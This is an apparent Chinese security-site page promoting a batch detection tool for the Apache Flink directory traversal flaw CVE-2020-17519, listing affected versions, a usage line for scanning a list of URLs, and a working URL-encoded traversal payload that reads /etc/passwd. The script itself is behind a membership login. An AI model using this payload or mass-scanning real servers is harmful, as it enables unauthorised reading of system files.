1. 极安网首页
  2. 网络安全工具

Apache Flink目录遍历漏洞批量检测工具(CVE-2020-17519)

Apache Flink目录遍历漏洞批量检测工具(CVE-2020-17519)-极安网

漏洞介绍

攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件.

受影响版本

1.11.0
1.11.1
1.11.2

CVE-2020-17519 payload

  1. /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

批量检测脚本

温馨提示:终身会员登陆后查看

使用方法:

  1. Python CVE-2020-17519.py urls.txt

urls.txt 中每个url一行,漏洞地址输出为vul.txt

警告

工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责

原创文章,作者: Admin ,转载请注明出处:https://www.secvery.com/5080.html